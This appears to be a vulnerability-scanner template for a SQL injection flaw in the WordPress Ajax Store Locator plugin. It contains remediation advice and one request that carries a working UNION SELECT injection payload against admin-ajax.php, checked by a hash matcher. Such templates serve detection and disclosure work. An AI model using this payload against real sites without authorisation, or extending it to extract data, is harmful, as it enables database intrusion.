id: CNVD-2015-02598
info:
  name: Wordpress Ajax Store Locator <= 1.2 SQL Injection Vulnerability
  author:
  - l0ne1y
  description: |-
    WordPress Ajax Store Locator SQL Injection Vulnerability
    WordPress is a blogging platform developed using PHP language. Users can set up their own blogs on servers that support PHP and MySQL databases.

    There is a SQL injection vulnerability in the Wordpress Ajax Store Locator. An attacker could exploit this vulnerability to compromise the application and access or modify data.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patch or the latest version of the program: http://codecanyon.net/item/ajax-store-locator-wordpress/5293356

    Temporary fix:
    1. Use precompiled statements. When using PDO, be careful not to splice variables directly into PDO statements. All query statements use the parameterized query interface provided by the database. Parameterized statements use parameters instead of embedding user input variables into the SQL statement. Almost all current database systems provide parameterized SQL statement execution interfaces. Using this interface can very effectively prevent SQL injection attacks.
    2. Escape or code the special characters (’”<>&*;, etc.) that enter the database.
    3. Confirm the type of each data. For example, numeric data must be numbers, and the storage fields in the database must correspond to int types.
    4. The data length should be strictly specified, which can prevent relatively long SQL injection statements from being executed correctly to a certain extent.
    5. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding for all data. Inconsistent encoding of the upper and lower layers may cause some filtering models to be bypassed.
    6. Strictly limit the database operation permissions of website users, and provide this user with permissions that are only sufficient for his or her work, thereby minimizing the harm of injection attacks to the database.
    7. Prevent the website from displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
    8. Filter dangerous characters, for example: use regular expressions to match keywords such as union, sleep, and, select, load_file, etc. If a match is found, the operation will be terminated.
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"f5bb0c8de146c67b44babbf4e6584cc0")
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1+UNION+SELECT+1,2,3,4,md5(123123123),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39--'
  method: GET
